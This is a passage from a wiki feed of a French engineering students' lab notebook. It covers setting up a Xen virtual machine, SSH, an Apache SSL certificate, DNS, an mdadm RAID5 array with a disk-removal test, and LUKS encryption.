       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
arrêtez la machine virtuelle, retirez lui une des trois partitions, relancez la. Essayez de remonter votre RAID5, que constatez-vous ? &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
 On copie des données sur le RAID5.&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46197</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46197"/>
				<updated>2017-11-13T10:35:23Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Certification SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout GreenArrow.key -out GreenArrow.csr&lt;br /&gt;
Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
If you enter '.', the field will be left blank.&lt;br /&gt;
-----&lt;br /&gt;
Country Name (2 letter code) [AU]:FR&lt;br /&gt;
State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:jjlddelamuerto.space&lt;br /&gt;
Email Address []:&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
GreenArrow.csr	GreenArrow.key&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# cat GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
-----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
root@BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/bind# cp certificat.crt /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
 root@GreenArrow:/etc/bind# cp serveur.key /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
 root@GreenArrow:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@GreenArrow:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-jjlddelamuerto.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/apache2/sites-available# cat 000-jjlddelamuerto.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.jjlddelamuerto.space&lt;br /&gt;
         ServerAlias jjlddelamuerto.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@GreenArrow:/etc/apache2# service apache2 start&lt;br /&gt;
 root@GreenArrow:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
arrêtez la machine virtuelle, retirez lui une des trois partitions, relancez la. Essayez de remonter votre RAID5, que constatez-vous ? &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
 On copie des données sur le RAID5.&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
